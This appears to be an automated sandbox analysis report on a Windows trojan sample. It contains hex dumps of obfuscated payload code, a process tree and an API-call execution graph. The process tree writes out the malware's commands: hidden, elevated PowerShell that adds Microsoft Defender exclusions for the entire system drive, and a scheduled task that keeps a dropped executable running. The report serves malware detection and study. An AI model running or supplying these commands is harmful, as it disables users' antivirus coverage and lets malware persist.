                            Data Ascii: HHe,rm\1.ZPH$&gbHd$JL)H3H+HHd$dH$'ueVW1Hr."{H8t5Q6nH8t=OHs*SwLHnH8tdqHsYH[\r^KH8'e/tf.
                            2023-05-14 02:51:07 UTC3086INData Raw: 03 6a ac fc e8 05 00 00 00 54 1a ca a2 26 48 ff c4 f9 eb 07 92 74 f2 ac 29 9f 75 72 07 92 f7 80 e4 50 73 4d 48 ff c4 38 ed 74 06 56 21 4e 80 44 8d 48 ff c4 38 c0 74 02 a0 d4 48 ff c4 48 ff c4 48 ff c4 38 c9 e9 04 00 00 00 5e f1 ea b6 74 03 ac dc c7 48 ff c4 eb 07 c1 1a 8d a0 41 52 b5 48 ff c4 eb 07 d8 ad 83 c3 c6 9c df 9d e9 07 00 00 00 8b 23 c3 60 eb be a0 eb 07 b8 4e d9 9b 31 18 58 48 33 c9 8a 0f e9 06 00 00 00 ad 8d 7d 5f f0 5f 48 8d 64 24 f8 eb 04 fa 30 95 57 48 89 04 24 e9 07 00 00 00 3e 83 d0 dc 40 9d 2a 9f eb 03 a8 fc 1f 38 f6 74 03 5f 9e 11 e8 05 00 00 00 85 36 6d 7c 2a 48 8d 64 24 08 e9 07 00 00 00 75 40 84 82 7f 96 a0 9e 58 eb 02 35 c2 eb 04 bc fd f9 48 48 ff c7 eb 06 b2 69 ca ae 3d c8 9c f9 72 02 ef 9c e8 04 00 00 00 7c c8 4b 7b 48 83 04 24 0c
                            Data Ascii: jT&Ht)urPsMH8tV!NDH8tHHH8^tHARH#`N1XH3}__Hd$0WH$>@*8t_6m|*Hd$u@X5HHi=r|K{H$
                            2023-05-14 02:51:07 UTC3102INData Raw: 07 eb d5 d6 59 b0 35 15 72 03 66 f3 3b e8 05 00 00 00 69 7b 92 41 9a 48 ff c4 38 c9 e9 05 00 00 00 69 45 4c d2 cb 74 02 66 d5 48 ff c4 f8 e9 04 00 00 00 6e 5e 87 d2 73 05 e9 ee f5 91 5c 48 ff c4 48 ff c4 f9 eb 02 98 2f 72 07 87 35 7b 72 d2 3c 88 48 ff c4 f8 eb 05 96 7b 7f 53 e1 73 03 c2 18 f7 48 ff c4 eb 05 66 fa 98 66 d8 48 ff c4 eb 03 c7 73 d2 48 ff c4 f9 72 07 d0 1d cd ee 17 f4 9d e9 04 00 00 00 b1 8a c4 af e9 07 00 00 00 ca 27 b7 98 9c 36 33 9e 58 eb 03 c3 62 ca eb 06 69 fd a4 69 8e fb 48 33 db 9c eb 06 61 e9 e9 c1 d4 c4 38 c0 74 07 ba fc c3 b9 7c ce f5 e8 02 00 00 00 78 3d 48 ff c4 f8 73 05 9c e3 29 f7 fb 48 ff c4 eb 03 fb 42 37 48 ff c4 f9 eb 05 cd 38 cc b6 26 72 05 5f e1 47 81 93 48 ff c4 eb 06 f5 e7 8a 93 a9 3e 48 ff c4 f8 73 02 f8 d2 48 ff c4 e9
                            Data Ascii: Y5rf;i{AH8iELtfHn^s\HH/r5{r<H{SsHffHsHr'63XbiiH3a8t|x=Hs)HB7H8&r_GH>HsH
                            2023-05-14 02:51:07 UTC3118INData Raw: fe e7 41 99 29 e8 03 00 00 00 7c af 23 48 83 c4 08 e9 02 00 00 00 be 53 eb 06 77 64 ea 43 c6 25 9e 48 8b 04 24 eb 06 ad 71 45 aa a1 ad 48 8d 64 24 08 e9 04 00 00 00 fc 70 43 68 eb 04 71 ed a8 8a 48 3b c3 e9 07 00 00 00 32 a6 66 e8 41 9f 2d 48 8d 64 24 f8 eb 06 79 bc a5 a4 ec d6 48 89 04 24 e9 05 00 00 00 a9 80 43 c7 3d 9f f8 eb 03 fa d5 81 73 02 c8 13 e8 03 00 00 00 40 d4 5e 48 83 c4 08 eb 02 53 f7 eb 05 99 5a 2a 63 b7 9e 58 e9 02 00 00 00 fa 40 eb 02 78 3d 0f 85 15 fe ff ff e9 ac 3a ff ff e9 00 00 00 00 e9 bb 00 00 00 e9 02 00 00 00 79 a2 48 8d 64 24 f8 48 89 04 24 9f eb 07 2e 67 a3 d5 55 b3 46 f9 e9 04 00 00 00 6d 82 12 5e 72 03 30 3e 3e e8 05 00 00 00 cd 29 f0 a2 f8 48 ff c4 e9 02 00 00 00 c2 4d 48 ff c4 38 ed eb 06 86 70 b7 7c a3 f5 74 05 d3 a6 b0 b4
                            Data Ascii: A)|#HSwdC%H$qEHd$pChqH;2fA-Hd$yH$C=s@^HSZ*cX@x=:yHd$H$.gUFm^r0>>)HMH8p|t
                            2023-05-14 02:51:07 UTC3134INData Raw: 00 e8 e1 fd fe ff f3 16 00 00 80 16 00 00 7b 16 00 00 22 16 00 00 04 00 00 00 43 00 00 00 2a 00 00 00 58 00 00 00 4e 00 00 00 62 00 00 00 31 00 00 00 10 00 00 00 5f 00 00 00 44 00 00 00 51 00 00 00 23 00 00 00 05 00 00 00 47 00 00 00 15 00 00 00 3d 00 00 00 f3 aa e9 2d 76 fe ff 50 e9 05 00 00 00 9d 6d 40 d7 29 9f eb 04 52 a2 87 18 38 db e9 05 00 00 00 9d f8 ae b7 26 74 07 46 af ce 44 ab b2 a4 e8 05 00 00 00 b6 4e 63 f8 1c 48 83 c4 08 eb 07 dc 3c cd f5 4a de 65 9e 58 e9 05 00 00 00 dd b7 9e c7 4f f3 aa e9 08 76 fe ff eb 04 9f e5 ac ea 9c e9 06 00 00 00 81 32 52 9f a2 8b eb 04 9d b1 83 d4 e8 04 00 00 00 21 56 18 c9 48 83 04 24 13 eb 03 6b 5c d1 c3 48 1b 36 b9 e9 04 00 00 00 db ea d4 1c 9d e9 07 00 00 00 a8 53 a4 b1 74 f2 f1 e9 03 00 00 00 76 fb 35 f3 aa e9
                            Data Ascii: {"C*XNb1_DQ#G=-vPm@)R8&tFDNcH<JeXOv2R!VH$k\H6Stv5
                            2023-05-14 02:51:07 UTC3150INData Raw: 0a 03 0a 0e 0a 06 01 28 00 00 00 0f 03 0a 01 0b 03 01 0a 0a 03 18 01 0a 07 20 8d 12 03 40 01 00 00 00 0a 07 0a 41 64 2e 40 01 00 00 00 0a 07 01 08 00 00 00 00 00 00 00 05 03 0e 01 01 03 0a 0e 09 0a 07 0a 01 00 00 00 00 00 00 00 0a 00 13 0a 0a 03 0a 0a 08 00 1e 00 00 00 0a 03 0a 13 0a 03 01 13 0c 03 0a 01 0a 03 13 0a 0a 03 0a 0a 08 00 04 00 00 00 0a 07 20 88 e7 06 40 01 00 00 00 09 0a 07 20 95 6a 08 40 01 00 00 00 0a 07 0a 57 64 2e 40 01 00 00 00 0a 07 01 08 00 00 00 00 00 00 00 05 03 0e 01 01 03 0a 0e 09 0a 03 0a 0e 0a 07 01 28 00 00 00 00 00 00 00 0f 03 0a 01 0a 03 01 13 01 03 01 0a 0a 03 0a 0e 0a 06 01 28 00 00 00 0f 03 0a 01 0b 03 01 0a 0a 03 13 01 0a 03 0a 13 0a 06 01 5b 01 00 00 0f 03 0a 01 0b 03 01 0a 0a 03 13 01 0a 03 0a 13 0a 07 01 00 00 00 40 00
                            Data Ascii: ( @Ad.@ @ j@Wd.@(([@
                            2023-05-14 02:51:07 UTC3166INData Raw: 0a 03 18 01 0a 03 0a 18 0a 03 01 13 0a 07 0b 19 00 00 00 00 00 00 00 0f 03 0a 01 0f 03 0a 0b 0a 03 07 0a 0b 02 03 07 0a 02 13 03 0a 07 0a 20 00 00 00 00 00 00 00 0a 02 1c 0a 0a 03 0a 0e 0a 07 01 40 00 00 00 00 00 00 00 0f 03 0a 01 0a 03 10 0a 0a 02 0a 13 0a 02 16 0a 0a 03 0a 0e 0a 06 01 28 00 00 00 0f 03 0a 01 0b 03 01 0a 0a 03 18 01 0a 07 20 03 c7 07 40 01 00 00 00 0a 07 0a 92 6a 2e 40 01 00 00 00 0a 07 01 08 00 00 00 00 00 00 00 05 03 0e 01 01 03 0a 0e 09 0a 03 0a 0e 0a 06 01 28 00 00 00 0f 03 0a 01 0b 03 01 0a 0a 03 13 01 0a 03 0a 0a 08 00 04 00 00 00 0a 07 20 f9 c8 07 40 01 00 00 00 09 0a 07 0a 00 80 00 00 00 00 00 00 0a 02 10 0a 0a 03 0a 16 0a 03 01 16 0c 03 0a 01 0a 03 16 0a 0a 03 0a 0e 0a 06 01 30 00 00 00 0f 03 0a 01 0b 03 01 0a 0a 03 18 01 0a 07
                            Data Ascii: @( @j.@( @0



                            Target ID:0
                            Start time:04:49:28
                            Start date:14/05/2023
                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exe
                            Imagebase:0x7ff61bd80000
                            File size:1382400 bytes
                            MD5 hash:E1AA70E7EF25FDADD52160E9B9F37B37
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low

                            Target ID:10
                            Start time:04:49:51
                            Start date:14/05/2023
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell "Start-Process <#uvbdteguxxcvxgbwugr#> powershell <#eusqdgkfiwwiaydnu#> -Verb <#jdnlkeczqufwm#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
                            Imagebase:0x7ff7383a0000
                            File size:447488 bytes
                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Reputation:high

                            Target ID:11
                            Start time:04:49:51
                            Start date:14/05/2023
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff745070000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:12
                            Start time:04:49:55
                            Start date:14/05/2023
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force
                            Imagebase:0x7ff7383a0000
                            File size:447488 bytes
                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Reputation:high

                            Target ID:13
                            Start time:04:49:55
                            Start date:14/05/2023
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff745070000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:15
                            Start time:04:50:35
                            Start date:14/05/2023
                            Path:C:\Users\user\AppData\Roaming\MonDisc.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Users\user\AppData\Roaming\MonDisc.exe
                            Imagebase:0x7ff62c8f0000
                            File size:1619428 bytes
                            MD5 hash:EEF2E49FD27D42237FFB929E1A39FC2D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 54%, ReversingLabs
                            • Detection: 56%, Virustotal, Browse
                            Reputation:low

                            Target ID:18
                            Start time:04:50:59
                            Start date:14/05/2023
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell "Start-Process <#uhyyubuhpbatllasmvhe#> powershell <#uhyyubuhpbatllasmvhe#> -Verb <#uhyyubuhpbatllasmvhe#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
                            Imagebase:0x7ff7383a0000
                            File size:447488 bytes
                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET

                            Target ID:19
                            Start time:04:51:00
                            Start date:14/05/2023
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff745070000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:20
                            Start time:04:51:00
                            Start date:14/05/2023
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks /create /sc daily /st 12:00 /f /tn "MonDisc" /tr "C:\Users\user\AppData\Roaming\MonDisc.exe"
                            Imagebase:0x7ff68d170000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:21
                            Start time:04:51:01
                            Start date:14/05/2023
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff745070000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:22
                            Start time:04:51:05
                            Start date:14/05/2023
                            Path:C:\Users\user\AppData\Roaming\MonDisc.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Users\user\AppData\Roaming\MonDisc.exe
                            Imagebase:0x7ff62c8f0000
                            File size:1619428 bytes
                            MD5 hash:EEF2E49FD27D42237FFB929E1A39FC2D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language

                            Target ID:23
                            Start time:04:51:05
                            Start date:14/05/2023
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force
                            Imagebase:0x7ff7383a0000
                            File size:447488 bytes
                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET

                            Target ID:24
                            Start time:04:51:05
                            Start date:14/05/2023
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff745070000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:25
                            Start time:04:51:07
                            Start date:14/05/2023
                            Path:C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Users\user\AppData\Roaming\Prtct\Updates\SysCare\LoWin64.exe
                            Imagebase:0x7ff71f5a0000
                            File size:1628132 bytes
                            MD5 hash:79F329EA2EC0C1BAED4F262F79B48BA5
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 49%, ReversingLabs
                            • Detection: 54%, Virustotal, Browse

                            Target ID:26
                            Start time:04:51:11
                            Start date:14/05/2023
                            Path:C:\Users\user\AppData\Roaming\MonDisc.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\AppData\Roaming\MonDisc.exe"
                            Imagebase:0x7ff62c8f0000
                            File size:1619428 bytes
                            MD5 hash:EEF2E49FD27D42237FFB929E1A39FC2D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language

                            Target ID:27
                            Start time:04:51:21
                            Start date:14/05/2023
                            Path:C:\Users\user\AppData\Roaming\MonDisc.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\AppData\Roaming\MonDisc.exe"
                            Imagebase:0x7ff62c8f0000
                            File size:1619428 bytes
                            MD5 hash:EEF2E49FD27D42237FFB929E1A39FC2D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language

                            Target ID:28
                            Start time:04:51:36
                            Start date:14/05/2023
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell "Start-Process <#kdqbcogdyphj#> powershell <#kdqbcogdyphj#> -Verb <#kdqbcogdyphj#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'
                            Imagebase:0x7ff7383a0000
                            File size:447488 bytes
                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:.Net C# or VB.NET

                            Target ID:29
                            Start time:04:51:36
                            Start date:14/05/2023
                            Path:C:\Windows\System32\schtasks.exe
                            Wow64 process (32bit):false
                            Commandline:schtasks /create /sc daily /st 12:00 /f /tn "MonDisc" /tr "C:\Users\user\AppData\Roaming\MonDisc.exe"
                            Imagebase:0x7ff68d170000
                            File size:226816 bytes
                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language

                            Target ID:30
                            Start time:04:51:36
                            Start date:14/05/2023
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff745070000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language

                            Target ID:31
                            Start time:04:51:36
                            Start date:14/05/2023
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff745070000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language

                            Target ID:37
                            Start time:04:51:44
                            Start date:14/05/2023
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force
                            Imagebase:0x7ff7383a0000
                            File size:447488 bytes
                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET

                            Target ID:39
                            Start time:04:51:44
                            Start date:14/05/2023
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff745070000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                              Execution Graph

                              Execution Coverage:2.6%
                              Dynamic/Decrypted Code Coverage:98.8%
                              Signature Coverage:23.8%
                              Total number of Nodes:727
                              Total number of Limit Nodes:31
57112->57113 57114 7ff62c90a4b0 18 API calls 57113->57114 57115 7ff62c8fe2e5 57114->57115 57118 7ff62c90dcb0 18 API calls 57115->57118 57117 7ff62c8fe307 57117->56669 57118->57117 57119 7ff62c911e28 57130 7ff62c9525b0 57119->57130 57121 7ff62c911e4c 57122 7ff62c93b370 20 API calls 57121->57122 57124 7ff62c911ec0 _fread_nolock 57122->57124 57123 7ff62c912056 57124->57123 57125 7ff62c954220 18 API calls 57124->57125 57126 7ff62c911fd7 57125->57126 57126->57123 57127 7ff62c90a4b0 18 API calls 57126->57127 57128 7ff62c912000 57127->57128 57129 7ff62c954120 16 API calls 57128->57129 57129->57123 57133 7ff62c93b4f0 57130->57133 57132 7ff62c9525e9 57134 7ff62c93b57e 57133->57134 57135 7ff62c93b505 57133->57135 57138 7ff62c93b5d3 57134->57138 57142 7ff62c93b59a 57134->57142 57136 7ff62c93b551 VirtualProtect 57135->57136 57137 7ff62c93b511 57135->57137 57140 7ff62c93b571 57136->57140 57141 7ff62c93b600 57136->57141 57139 7ff62c93b51a VirtualProtect 57137->57139 57137->57140 57138->57138 57143 7ff62c93b5e8 VirtualProtect 57138->57143 57139->57141 57145 7ff62c93b53a 57139->57145 57140->57132 57150 7ff62c93b9d0 19 API calls 57141->57150 57146 7ff62c93b5c5 57142->57146 57147 7ff62c93b5a3 VirtualProtect 57142->57147 57143->57141 57143->57146 57145->57132 57146->57132 57147->57141 57148 7ff62c93b5bb 57147->57148 57148->57146 57149 7ff62c93b608 57150->57149 57151 25e7e323f7f 57152 25e7e323f88 57151->57152 57155 25e7e323fd4 57152->57155 57156 25e7e323f31 57152->57156 57157 25e7e324036 57152->57157 57154 25e7e32400a CreateMutexW 57154->57156 57155->57154 57155->57156 57158 25e7e323fd4 57157->57158 57158->57157 57159 25e7e32400a CreateMutexW 57158->57159 57160 25e7e32404d 57158->57160 57159->57160 57160->57155 57161 7ff62c90b8ab 57166 7ff62c90c120 57161->57166 57165 7ff62c90b8c8 57167 7ff62c90c17e 57166->57167 57173 7ff62c90ba90 57167->57173 57170 7ff62c973de0 _handle_error 4 API calls 57171 7ff62c90b8ba 57170->57171 57172 7ff62c90bce0 18 API calls 57171->57172 57172->57165 57174 
7ff62c90bad1 57173->57174 57185 7ff62c90baf9 _fread_nolock 57173->57185 57175 7ff62c90bcc6 57174->57175 57178 7ff62c90baef 57174->57178 57179 7ff62c90bb24 57174->57179 57191 7ff62c901650 18 API calls 57175->57191 57177 7ff62c90bb76 57181 7ff62c909d30 18 API calls 57177->57181 57182 7ff62c909d30 18 API calls 57178->57182 57183 7ff62c909d30 18 API calls 57179->57183 57187 7ff62c90bb9f 57181->57187 57182->57185 57183->57185 57184 7ff62c90bc95 57184->57170 57185->57175 57185->57177 57185->57187 57186 7ff62c90bc51 57186->57184 57190 7ff62c90bce0 18 API calls 57186->57190 57187->57186 57189 7ff62c909d30 18 API calls 57187->57189 57189->57186 57190->57186 57192 7ff62c8f4a01 57193 7ff62c8f4a0c 57192->57193 57194 7ff62c8f4a30 57192->57194 57193->57194 57196 7ff62c8ff9d0 57193->57196 57211 7ff62c984d84 57196->57211 57199 7ff62c8ffa42 57200 7ff62c8ffa78 57199->57200 57214 7ff62c910750 57199->57214 57202 7ff62c8ffaa7 57200->57202 57220 7ff62c8feea0 18 API calls _handle_error 57200->57220 57203 7ff62c8ffb0f 57202->57203 57221 7ff62c8feea0 18 API calls _handle_error 57202->57221 57204 7ff62c8ffb4a 57203->57204 57222 7ff62c8feea0 18 API calls _handle_error 57203->57222 57206 7ff62c984d84 _set_errno_from_matherr 11 API calls 57204->57206 57208 7ff62c8ffb4f SetLastError 57206->57208 57209 7ff62c9ee048 57208->57209 57223 7ff62c9c5560 GetLastError 57211->57223 57213 7ff62c8ff9ef GetLastError 57213->57199 57215 7ff62c910789 57214->57215 57216 7ff62c8f3037 43 API calls 57215->57216 57217 7ff62c9107ad 57216->57217 57218 7ff62c9107d7 57217->57218 57219 7ff62c8f3037 43 API calls 57217->57219 57218->57200 57219->57217 57220->57202 57221->57203 57222->57204 57224 7ff62c9c5587 57223->57224 57225 7ff62c9c5582 57223->57225 57229 7ff62c9c558f SetLastError 57224->57229 57246 7ff62c9c6f60 4 API calls 2 library calls 57224->57246 57254 7ff62c9c6f18 GetLastError FreeLibrary GetProcAddress TlsGetValue try_get_function 57225->57254 57228 7ff62c9c55aa 57228->57229 57247 7ff62c9c5ecc 57228->57247 
57229->57213 57233 7ff62c9c55db 57257 7ff62c9c6f60 4 API calls 2 library calls 57233->57257 57234 7ff62c9c55cb 57255 7ff62c9c6f60 4 API calls 2 library calls 57234->57255 57237 7ff62c9c55e3 57238 7ff62c9c55f9 57237->57238 57239 7ff62c9c55e7 57237->57239 57259 7ff62c9c4e98 11 API calls _set_errno_from_matherr 57238->57259 57258 7ff62c9c6f60 4 API calls 2 library calls 57239->57258 57240 7ff62c9c55d2 57256 7ff62c9c5f4c 11 API calls 2 library calls 57240->57256 57244 7ff62c9c5601 57260 7ff62c9c5f4c 11 API calls 2 library calls 57244->57260 57246->57228 57253 7ff62c9c5edd _set_errno_from_matherr 57247->57253 57248 7ff62c9c5f2e 57250 7ff62c984d84 _set_errno_from_matherr 10 API calls 57248->57250 57249 7ff62c9c5f12 RtlAllocateHeap 57251 7ff62c9c55bd 57249->57251 57249->57253 57250->57251 57251->57233 57251->57234 57253->57248 57253->57249 57261 7ff62c9e25c0 RtlLeaveCriticalSection _invalid_parameter_noinfo _set_errno_from_matherr 57253->57261 57255->57240 57256->57229 57257->57237 57258->57240 57259->57244 57260->57229 57261->57253 57262 7ff62c8f1a21 57265 7ff62c90cf30 57262->57265 57264 7ff62c8f1a47 57271 7ff62c90cf63 57265->57271 57266 7ff62c90d2e7 57276 7ff62c901650 18 API calls 57266->57276 57268 7ff62c90a4b0 18 API calls 57268->57271 57269 7ff62c90d1af 57270 7ff62c90d151 57269->57270 57277 7ff62c901660 18 API calls 57269->57277 57270->57264 57271->57266 57271->57268 57271->57269 57271->57270 57275 7ff62c936220 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57271->57275 57275->57271 57278 7ff62c905020 57279 7ff62c8f3037 43 API calls 57278->57279 57280 7ff62c905094 57279->57280 57281 7ff62c8f63ba GetDesktopWindow 57282 7ff62c8f63cc 57281->57282 57283 7ff62c8f6476 GetDoubleClickTime 57282->57283 57284 7ff62c8f647e GetSystemDefaultLangID 57283->57284 57284->57284 57285 7ff62c8f6495 57284->57285 57309 7ff62c984af0 57285->57309 57288 7ff62c8f64b8 57289 7ff62c8f6509 GetDoubleClickTime 57288->57289 57291 7ff62c8f6514 57289->57291 57290 
7ff62c8f65d4 GetDoubleClickTime GetDesktopWindow GetWindowTextLengthW 57292 7ff62c8f65f1 57290->57292 57291->57290 57291->57291 57292->57292 57293 7ff62c8f6602 GetDoubleClickTime 57292->57293 57294 7ff62c8f660a 57293->57294 57294->57294 57295 7ff62c8f6629 GetWindowTextLengthW 57294->57295 57296 7ff62c8f6636 57295->57296 57297 7ff62c8f66ac GetCommandLineW GetForegroundWindow GetTopWindow 57296->57297 57298 7ff62c8f66d0 57297->57298 57299 7ff62c984af0 13 API calls 57298->57299 57300 7ff62c8f66dc 57299->57300 57301 7ff62c8f66e6 GetLargePageMinimum GetForegroundWindow 57300->57301 57303 7ff62c8f66f9 57301->57303 57302 7ff62c8f67f0 GetTickCount 57304 7ff62c8f6884 57302->57304 57303->57302 57307 7ff62c8f672e 57303->57307 57305 7ff62c8f68a0 7 API calls 57304->57305 57308 7ff62c8f68e6 57305->57308 57306 7ff62c8f6749 GetForegroundWindow 57306->57307 57307->57302 57307->57303 57307->57306 57308->57308 57310 7ff62c984b18 57309->57310 57320 7ff62c984bcb _fread_nolock 57309->57320 57311 7ff62c984bdb 57310->57311 57315 7ff62c984b2f 57310->57315 57314 7ff62c9c5560 _set_errno_from_matherr 11 API calls 57311->57314 57311->57320 57312 7ff62c984d84 _set_errno_from_matherr 11 API calls 57313 7ff62c8f64ad GetDoubleClickTime 57312->57313 57313->57288 57316 7ff62c984bf7 57314->57316 57317 7ff62c984b70 57315->57317 57318 7ff62c984b51 SetConsoleCtrlHandler 57315->57318 57316->57320 57323 7ff62c9c5a90 12 API calls _set_errno_from_matherr 57316->57323 57322 7ff62c9c5b8c RtlLeaveCriticalSection 57317->57322 57318->57317 57320->57312 57320->57313 57323->57320 57324 7ff62c90b5f0 57327 7ff62c90bff0 57324->57327 57326 7ff62c90b608 _fread_nolock 57326->57326 57328 7ff62c90c056 57327->57328 57329 7ff62c90c014 57327->57329 57331 7ff62c909cc0 18 API calls 57328->57331 57330 7ff62c909cc0 18 API calls 57329->57330 57337 7ff62c90c021 57330->57337 57332 7ff62c90c060 57331->57332 57333 7ff62c90c10b 57332->57333 57334 7ff62c909d30 18 API calls 57332->57334 57332->57337 57341 7ff62c901650 18 API calls 
